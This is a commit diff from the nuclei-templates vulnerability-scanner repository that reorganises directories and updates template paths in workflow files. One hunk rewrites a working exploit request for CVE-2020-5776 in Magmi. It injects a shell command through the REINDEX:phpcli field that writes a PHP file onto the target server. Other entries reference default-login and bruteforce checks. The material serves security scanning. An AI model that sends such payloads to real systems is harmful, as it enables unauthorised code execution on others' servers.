workflow updates

patch-1
team-projectdiscovery 2021-01-09 18:58:57 +05:30
parent 187e4a5feb
commit eaaf56e9da
14 changed files with 18 additions and 36 deletions

View File

@ -22,8 +22,8 @@ vulnerabilities/x-forwarded-host-injection.yaml
fuzzing/
# Wordlist directory contains payload to be used with templates.
wordlists/
misc/
helpers/
miscellaneous/
# Workflows are excluded from default run to avoid duplicate scans.
workflows/

View File

@ -20,7 +20,7 @@ requests:
Content-type: application/x-www-form-urlencoded
Connection: close
profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
- |
POST /magmi/web/magmi_run.php HTTP/1.1
Host: {{Hostname}}

View File

@ -17,7 +17,7 @@ info:
requests:
- payloads:
data: "payloads/CVE-2020-6287.xml"
data: helpers/payloads/CVE-2020-6287.xml
raw:
- |
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1

View File

@ -2,7 +2,7 @@ id: basic-auth-bruteforce
info:
name: Basic Auth Bruteforce
author: "@w4cky_"
author: w4cky_
severity: high
# Impotent Notes:-

View File

@ -8,7 +8,7 @@ info:
requests:
- payloads:
plugin_wordlist: wordlists/wp-plugins.txt
plugin_wordlist: helpers/wordlists/wp-plugins.txt
# Thanks to RandomRobbieBF for the wordlist
# https://github.com/RandomRobbieBF/wordpress-plugin-list

View File

@ -10,7 +10,7 @@ info:
workflows:
- template: panels/cisco-asa-panel.yaml
- template: exposed-panels/cisco-asa-panel.yaml
subtemplates:
- template: cves/2020/CVE-2020-3187.yaml

View File

@ -10,7 +10,7 @@ info:
workflows:
- template: panels/grafana-detect.yaml
- template: exposed-panels/grafana-detect.yaml
subtemplates:
- template: default-credentials/grafana-default-credential.yaml
- template: default-logins/grafana-default-credential.yaml

View File

@ -10,7 +10,7 @@ info:
workflows:
- template: technologies/jira-detect.yaml
- template: exposed-panels/jira-detect.yaml
subtemplates:
- template: cves/2017/CVE-2017-9506.yaml
@ -23,8 +23,4 @@ workflows:
- template: cves/2019/CVE-2019-11581.yaml
- template: cves/2020/CVE-2020-14179.yaml
- template: cves/2020/CVE-2020-14181.yaml
- template: security-misconfiguration/jira-service-desk-signup.yaml
- template: security-misconfiguration/jira-unauthenticated-dashboards.yaml
- template: security-misconfiguration/jira-unauthenticated-popular-filters.yaml
- template: security-misconfiguration/jira-unauthenticated-projects.yaml
- template: security-misconfiguration/jira-unauthenticated-user-picker.yaml
- template: vulnerabilities/jira/

View File

@ -14,4 +14,4 @@ workflows:
matchers:
- name: mida-eframework
subtemplates:
- template: vulnerabilities/mida-eframework-xss.yaml
- template: vulnerabilities/other/mida-eframework-xss.yaml

View File

@ -10,7 +10,7 @@ info:
workflows:
- template: panels/rabbitmq-dashboard.yaml
- template: exposed-panels/rabbitmq-dashboard.yaml
subtemplates:
- template: default-credentials/rabbitmq-default-admin.yaml
- template: default-logins/rabbitmq-default-admin.yaml

View File

@ -9,8 +9,8 @@ info:
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: panels/solarwinds-orion.yaml
- template: exposed-panels/solarwinds-orion.yaml
subtemplates:
- template: cves/2018/CVE-2018-19386.yaml
- template: cves/2020/CVE-2020-10148.yaml
- template: default-credentials/solarwinds-default-admin.yaml
- template: default-logins/solarwinds-default-admin.yaml

View File

@ -15,5 +15,4 @@ workflows:
- template: cves/2018/CVE-2018-1271.yaml
- template: cves/2018/CVE-2018-1271.yaml
- template: cves/2020/CVE-2020-5410.yaml
- template: vulnerabilities/springboot-actuators-jolokia-xxe.yaml
- template: vulnerabilities/springboot-h2-db-rce.yaml
- template: vulnerabilities/springboot/

View File

@ -16,17 +16,4 @@ workflows:
- template: cves/2019/CVE-2019-15858.yaml
- template: cves/2019/CVE-2019-6715.yaml
- template: cves/2019/CVE-2019-9978.yaml
- template: files/wordpress-db-backup.yaml
- template: files/wordpress-debug-log.yaml
- template: files/wordpress-directory-listing.yaml
- template: files/wordpress-emergency-script.yaml
- template: files/wordpress-installer-log.yaml
- template: files/wordpress-tmm-db-migrate.yaml
- template: files/wordpress-user-enumeration.yaml
- template: security-misconfiguration/wordpress-accessible-wpconfig.yaml
- template: vulnerabilities/sassy-social-share.yaml
- template: vulnerabilities/w3c-total-cache-ssrf.yaml
- template: vulnerabilities/wordpress-social-metrics-tracker.yaml
- template: vulnerabilities/wordpress-wordfence-xss.yaml
- template: vulnerabilities/wordpress-wpcourses-info-disclosure.yaml
- template: vulnerabilities/easy-wp-smtp-listing.yaml
- template: vulnerabilities/wordpress/